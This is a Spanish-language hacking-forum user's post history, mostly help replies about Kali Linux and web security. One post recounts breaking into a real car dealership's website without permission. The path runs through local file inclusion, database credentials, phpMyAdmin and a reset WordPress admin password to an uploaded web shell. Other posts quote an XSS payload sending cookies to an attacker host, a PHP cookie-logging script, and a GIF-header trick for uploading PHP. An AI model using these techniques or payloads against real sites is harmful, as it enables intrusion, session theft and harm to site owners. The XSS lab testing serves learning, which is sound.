Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Nobody

Páginas 1 2 3 4 ... 10

#21

Off Topic / Re:¿De donde el origen de tu Nick/Alias?

Abril 11, 2017, 04:27:55 PM

Hmm, luego de leer las historias, la mía va a dar vergüenza.

En los origenes, mi alias era otro completamente diferente. Dicho alias estaba asociado a una vida pasada y oscura (nada ilegal, eh!), de la cual quería alejarme.
Hace tiempo, siendo mi propio beta tester de un código, se me ocurrió el nombre de "Nobody", ya que "nadie" lo estaba probando, en realidad.

Finalmente, al ingresar al staff de Underc0de, le pedí al colega @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login si podía cambiar mi horroroso alias por el nuevo.
Actualmente, "cierta gente" (para no nombrarlos) me dicen "Nocuerpo". Así que ustedes dirán, Nobody o Nocuerpo

Saludos.

#22

Dudas y pedidos generales / Re:¿Qué es y cómo funciona el phishing?

Febrero 18, 2017, 06:56:18 PM

¡Hola!

El phishing no es "algo", es una técnica que se usa dentro de lo que sería ingeniería social.

Tenemos unos enlaces explicativos del tema:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

¡Espero que te sea de ayuda!
Saludos.

#23

Off Topic / ¿LFI? También un auto gratis.

Febrero 17, 2017, 03:54:09 AM

No es costumbre mía publicar historias, pero hoy salió mi Chema Alonso del interior y me decidí por publicar una.

Para darle apertura, creo que lo más correcto sería ponerlos en situación, así poder entender la historia en su totalidad.
Todo comenzó utilizando nuestro confiable Google, y si se pronuncia esa palabra en un foro de seguridad informática podríamos decir que casi siempre se refiere a Google Dorking. ¿Quién no ha utilizado Google para conseguir una página web vulnerable en forma de PoC? Espero sacarme algo responsabilidad diciendo eso.

Continuando con la historia, mi meta era lograr subir una shell a una página web tan solo aprovechándome de la vulnerabilidad You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login —de ahora en más, LFI—.
Posiblemente alguno ahora esté pensando en que esta publicación no tendría sentido, si todos conocemos de que trata LFI y sabemos implementarlo, ¿qué sentido tendría relatar una historia sobre un proceso que posiblemente conozcamos? La respuesta es relativamente simple. Mi intención no era obtener nada de esto —aunque un auto gratis no estaría mal—, simplemente hacer un promedio de cuantas páginas realmente son afectadas por este tipo de vulnerabilidad.

Para el que se lo esté preguntando, la página es de un concesionario de vehículos, algo tan simple con acceder a la base de datos y cambiar los precios de los vehículos, ¿no? —aunque todos sepamos que el precio que aparece nunca es el precio que usan—.

Una vez encontrada la página perfecta para intentar lograr mi cometido, era cuestión de aprovechar el LFI y un poco de Path Traversal para obtener información. Como no se trataba de algún CMS conocido, mi primera reacción fue intentar obtener el contenido del archivo index, para darme una idea de lo que tenía en frente.
Podría decir —y sin la necesidad de mostrarlo con una foto— que ese archivo aportó información valiosa y tal vez engañosa. Lo primero que noté fue una ruta hacia un archivo llamado "conn.php" dentro de la carpeta "Connections", creo que es evidente lo que tenía frente a mis ojos.

Llegada la inmediata necesidad de descargar ese archivo y al fin poder visualizar la información SQL completa, no dude en verificar el host, rezando que sea remoto y así poder hacer una conexión por consola desde mi PC, aunque no podía tener tan buena suerte. Mi último grano de esperanza era que la página contara con algún servicio de administración de base de datos —llámese phpMyAdmin—, y así fue.

Estando ya conectado, pude ver dos bases de datos. Revisando en orden, la primera se trataba de una base de datos completamente personalizada, es decir, no se trataba de ningún CMS o algo similar. Si, contenía tablas que hacían referencia a administradores y usuarios. Ese era el momento, conseguir el panel administrativo, subir shell y dar por terminado mi trabajo; Nuevamente, nada es tan fácil. Teniendo un archivo robots.txt vacío, lo mejor que me quedaba era probar nombres de directorios frecuentes, aunque nuevamente mi suerte era poca.

Pasado ya una unos minutos —muy largos—, podría decir que mi trabajo se había frustrado y lo mejor era abandonar, si... estando tan cerca, pero abandonar no era una opción. En ese momento un rayo de sol me iluminó —en una noche oscura, luego de una lluvia intensa—. ¡Eureka! Recordé que aún había otra base de datos por revisar, y para mi suerte era nada más y nada menos que una base de datos WordPress. Teniendo la posibilidad de editar la contraseña del administrador, loguearme y subir shell desde el propio panel administrativo de WordPress, creo que era un pecado no tentarse.

¡STOP! Los problemas seguían, todavía faltaba encontrar la ruta del blog, aunque no debería ser muy difícil, ¿no?
Si, imagínense, en la página no había ningún enlace que apuntase hacia una aparente instalación de WordPress. Esto ya me estaba frustrando, recuerdo haber bajado el archivo ".htaccess", sin resultados sobre una dirección del blog —y si, tampoco me falto ganas de mirar si existía un directorio admin—. En ese momento recordé que en otra pestaña tenía a mi amigo Google esperandome, un dork sencillito debería revelar la instalación de WordPress.

Sin más esperas, recurrí a un dork tan sencillo que ni merece la pena mencionar, aunque de no hacerlo, la historia no estaría completa.

¡Eso es, la instalación... pero no! Al parecer hoy el mundo estaba en contra mío, esa instalación no estaba correctamente configurada y por ende no servía.
Sin perder muchas esperanzas, supuse que si Google ayudó una vez, tal vez pueda ayudar otra. Sacando del cajón de antigüedades otro dork, no dude ni por un segundo en probarlo, sabiendo muy dentro mío que si no resultaba mis posibilidades de lograr mi meta eran casi nulas.

Con los dedos cruzados, entré al tercer resultado, todo apuntaba a que era realmente una instalación de WordPress, y para mi suerte lo era.
En ese momento se me cruzó por la cabeza el pensamiento oscuro de "es el fin, lo logré", cuando ni había comenzado. En una pestaña, el panel de ingreso administrativo, en otra, phpMyAdmin. Solo era cuestión de segundos, anotarse la contraseña real en un bloc de notas, modificarla por la que más me gustase y listo, obtenía acceso completo.

Para no aburrir a nadie más, voy a simplemente obviar la explicación de como subir una shell mediante el panel administrativo de WordPress, esa información se obtiene en cuestión de segundos con un buscador —el buscador de Underc0de no está nada mal, hee hee!—.

Ya con la shell en el servidor y el servidor en mi poder, era solo cuestión de un par de clics para arruinar completamente la concesionaria y alojar contenido ilegal, posteriormente claro, hacer una denuncia. Para suerte de ellos —y posiblemente también mía—, no estaba en mis planes del 2017 ser maligno, así que simplemente me limité a intentar reportar mis descubrimientos al administrador del sitio. Reportar un error a un administrador no es de mis tareas favoritas, ya que la mayoría nunca responden, y los que responden lo hacen diciendo "gracias, lo solucionaremos a la brevedad" o te acusan de infringir la ley —en realidad tienen razón— y, por si fuera poco, decirte que tu intensión era causar el mal.

Tragándome mis sentimientos y experiencias pasadas, recordé que ese blog tenía un sistema de chat para ventas. Un representante podía perfectamente decirme con quien debía hablar para reportar este tipo de errores —ignorando completamente el correo que figura en whois y el correo de la cuenta administrador del blog—.

Para mi mala suerte —o tal vez buena suerte—, lo que pasó fue lo siguiente:

Era de esperarse, ¿a quién se le ocurre reportar una vulnerabilidad a horarios de la madrugada? Aunque mi conciencia está limpia, tuve el interés en reportar.
En algún futuro cercano posiblemente reporte el error, aunque de seguro no les importará y siga todo igual.

Saludos,
Nobody.

#24

Dudas y pedidos generales / Re:Kali linux 2.0

Febrero 16, 2017, 09:03:35 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
La 2.0 no es la 2016.2? xq lo descargue directo de la pagina pinche el enlase de la 2.0 y se me descargo fue la 2016.2

¡Hola!

Actualmente podés ver el historial de versiones de Kali Linux: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Precisamente, la versión 2.0 es dos versiones anteriores a la actual (2016.2).

Saludos.

#25

Dudas y pedidos generales / Re:Kali linux 2.0

Febrero 16, 2017, 02:07:00 AM

¡Hola!

Disculpá, pero no entiendo en la totalidad tu duda. El título del post dice "Kali Linux 2.0" y decís que tenés instalada "Kali Linux 2016.2".

En todo caso, si acabás de instalarla ya viene con los repositorios, simplemente apt-get upgrade && apt-get update.

Si en todo caso aún necesitás los repositorios, tenés que usar el de Kali Rolling, que corresponde a Kali 2016.2.

Creo que esa era tu duda.
Saludos.

#26

Dudas y pedidos generales / Re:Crear mail sin número de teléfono

Febrero 10, 2017, 05:10:46 PM

¡Hola!

Dependiendo del dominio que necesités, si especificamente tiene que ser hotmail/outlook, gmail o yahoo, es más complicado. Aunque hotmail pide verificar el número de teléfono algunas veces, no lo hace regularmente.

Otra alternativa es You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, el cual no pide número de teléfono y te da varios dominios a elegir.

Saludos.

#27

Dudas y pedidos generales / Re:¿Es posible robar cookies con un XSS Reflejado?

Enero 30, 2017, 10:21:38 AM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Pero para robar una cookie no necesitas que salte el alert. Lo que te frena el filtro de Chrome es el alert. Por ejemplo, el siguiente vector debería funcionarte aunque tengas chrome
Código: text
<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>
Al no tener el alert, no salta el cartel (que es lo que frena chrome) y robas las cookies de igual forma.

Saludos,
ANTRAX

Me dejaste pensando sobre el filtro anti XSS de Chrome, voy a hacer una pruebas y comparto resultados. La verdad que nunca pensé que es lo que filtra realmente ese anti XSS.

Edit: Bueno, después de probar dos diferentes vectores, quedó en conclusión que el filtro Anti XSS de Chrome es bastante más complejo de lo que pensabamos, comparto resultados:

CitarVector: xss.php?color=red"></font><script>window.location='You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login</script><font>

Después de eso pensé que tal vez el filtro Anti XSS filtraba vectores "complejos" o que apuntasen hacia otro dominio, así que intenté con un vector un poco más simple (y con un xss.php más simple aún, para que no hubiese ningún tipo de problemas).

CitarVector: xss.php?str=<h1 onmouseover='document.body.innerHTML = "XSS";'>test</h1>

Otras pruebas que realicé (de las cuales no tengo capturas), en las que Chrome también filtra vectores como " ' onmouseover=...", pero no filtra vectores como "<h1>Underc0de</h1>". En conclusión, filtra todo contenido que pueda ser "malicioso", es decir, todo código JavaScript.

Adjunto los códigos PHP utilizados en el laboratorio, por si alguien quiere hacer sus propias pruebas.

cookie.php

Código: php

<?php
error_reporting(0);
define('ROOTPATH', dirname(__FILE__));
$cookie 	= $_GET['c'];
$log		= fopen(ROOTPATH . "/logs.txt", "a");
$format 	= "Cookie: %s\n\n";
$print		= sprintf($format);
fwrite($log, $print);
fclose($log);
?>

xss.php (imagen uno).

Código: php

<?php

$color = $_GET['color'];
echo "<font color=\"$color\">Hello, world!</font>";

if(!isset($_COOKIE['randcookie']))
{
	$random = rand();
	setcookie('randcookie', $random);
	$_COOKIE['randcookie'] = $random;
	echo "<br/><br/>Random cookie does not exist, creating a new one!";
}

?>

xss.php (imagen dos)

Código: php

<?php

$str = $_GET["str"];
print $str;

?>

Para finalizar quiero aclarar que fueron pruebas muy poco elaboradas y estaré intentando evadir el filtro Anti XSS de Chrome por otros métodos, en caso de lograrse, compartiré los resultados.

Saludos.

#28

Dudas y pedidos generales / Re:¿Es posible robar cookies con un XSS Reflejado?

Enero 30, 2017, 09:33:45 AM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
En realidad el reflejado si sirve para robar cookies. Pero debería ir por GET.. En este caso el script no viaja por la URL, por eso no puede.

Tenés razón, pero en ese caso existiría el problema de que, por ejemplo en Google Chrome, saltaría el filtro anti XSS.

Saludos.

#29

Dudas y pedidos generales / Re:¿Es posible robar cookies con un XSS Reflejado?

Enero 30, 2017, 09:15:27 AM

¡Hola!

Efectivamente, como dice ANTRAX, los XSS refljeados no sirven para robar cookies, para eso necesitarías un "stored xss", que es un XSS, solamente que es persistente (precisamente, los stored xss también son llamados persistent xss).

Saludos.

#30

Dudas y pedidos generales / Re:SQL DUMPER

Enero 29, 2017, 03:41:29 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Aquí lo tienes limpio.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

¡Hola!

Cabe destacar que la contraseña para descomprimir el archivo es "14931493".

P.D.: ¿No te sería de utilidad SQLMap? Si querés fiarte 100% de que no viene con "regalito", SQLMap es de código abierto.

Saqludos.

#31

Windows / Re:Como recuperar y reparar memorias flash USB que Windows no reconoce

Enero 28, 2017, 09:21:50 PM

Excelente Stiu! Ese programita está haciendo milagros con la USB que te comentaba, esperemos que la haga volver a la vida

¡Muchas gracias!
Saludos.

#32

Dudas y pedidos generales / Re:Activar persistencia en kali

Enero 25, 2017, 10:35:32 AM

¡Hola!

Como te comenté en el post anterior, Kali Linux tiene un doc. oficial de como hacerlo, en su idioma nativo: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Si el inglés no es tu fuerte, en Google se encuentra muchísima información de como hacerlo, y todo esto en tú idioma nativo.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Particularmente ese vídeo me fue útil alguna vez.

Saludos.

#33

Dudas y pedidos generales / Re:Instalación de Kali Linux sin la necesitad de particionar el disco, ¿es posible?

Enero 25, 2017, 02:04:50 AM

¡Hola!

De ser posible, es posible. Como mencionaron anteriormente, la solución más sencilla es con una máquina virtual, pero a veces no es la mejor opción.

Particularmente no hace falta instalar Kali Linux para poder usarlo, simplemente un live usb con persistencia es suficiente. Si aún así deseás instalarlo, te puedo recomendar lo que hice yo, que fue instalar Kali en un disco duro independiente.

Te dejo el enlace que explica como crear un live usb de Kali con persistencia: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos.

#34

Ideas y Sugerencias / Re:Organizar la seccion de talleres

Enero 23, 2017, 11:10:54 AM

¡Hola!

Por mi parte me parece una excelente idea, se la comentaré al resto del staff.

Gracias, @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Saludos.

#35

Underc0de / Re:Desafío #2 - Viernes Negro

Enero 20, 2017, 02:10:05 PM

Me sumo al común popular, bastante sencillo, pero entretenido.

Enviado, saludos.

#36

Dudas y pedidos generales / Re:Que tipo de cifrado es el que explico aca ?

Enero 13, 2017, 06:16:11 PM

¡Hola!

Podés verificar este y muchos más hashes desde acá: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos.

#37

Dudas y pedidos generales / Re:problema con wargame

Enero 12, 2017, 08:17:43 PM

¡Hola!

Antes de responder, te quería avisar que Free WHA cierra todos los hosts que tengan web shells, ya que infringe sus normas (o al menos eso hacían en su tiempo).

Lo más básico que podés probar es subir un archivo con extensión y cabeceras GIF, pero que contenga código PHP.

Código: text

GIF89a<?php
// Código PHP
?>

En la mayoría de los casos debería andar (es cierto que hay técnicas para evitar este tipo de bypass).

Espero que te sirva,
saludos.

#38

Dudas y pedidos generales / Re:¿Cómo instalar Kali con un USB Booteable?

Enero 02, 2017, 02:06:25 AM

¡Hola!

Si lo que querés es iniciarlo desde un USB, entonces no querés instalarlo, querés iniciarlo en modo "live". Simplemente tenés que montar la ISO de Kali Linux en el USB.

Para Windows, la opción más fácil es usar un programa llamado "Rufus", el cuál es bastante sencillo y está en español, por lo cual no necesita guía alguna.
Caso contrario, si querés montar la ISO desde Linux, lo más recomendable sería hacerlo con el comando "dd", o simplemente con el comando "cp".

En cualquier caso, Kali Linux tiene documentación oficial con respecto a este tema.

Los enlaces son los siguientes:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (en el idioma nativo, que es el inglés).
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (en español).

Espero que te sirva.

¡Saludos!

#39

Dudas y pedidos generales / Re:Consulta sobre LightIRC

Enero 01, 2017, 12:01:06 PM

¡Hola!

Feliz año nuevo para vos también, b4r7.

Dada las respuestas de este post, daré el tema como solucionado. Por favor, no dudés en volver a comentar si surge algún otro problema.

Saludos.

#40

Dudas y pedidos generales / Re:Consulta sobre LightIRC

Diciembre 30, 2016, 12:09:02 AM

¡Hola nuevamente! Felices fiestas.

La verdad que de IRC se muy poco, no me gustan demasiado. Lo que te puedo recomendar es algún cliente de código abierto o similar, conozco un solo webchat IRC que se llama "Hira", pero la verdad que nunca me puse a revisarlo.

Te dejo el enlace al GitHub, por si te interesa: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

¡Saludos!

Páginas 1 2 3 4 ... 10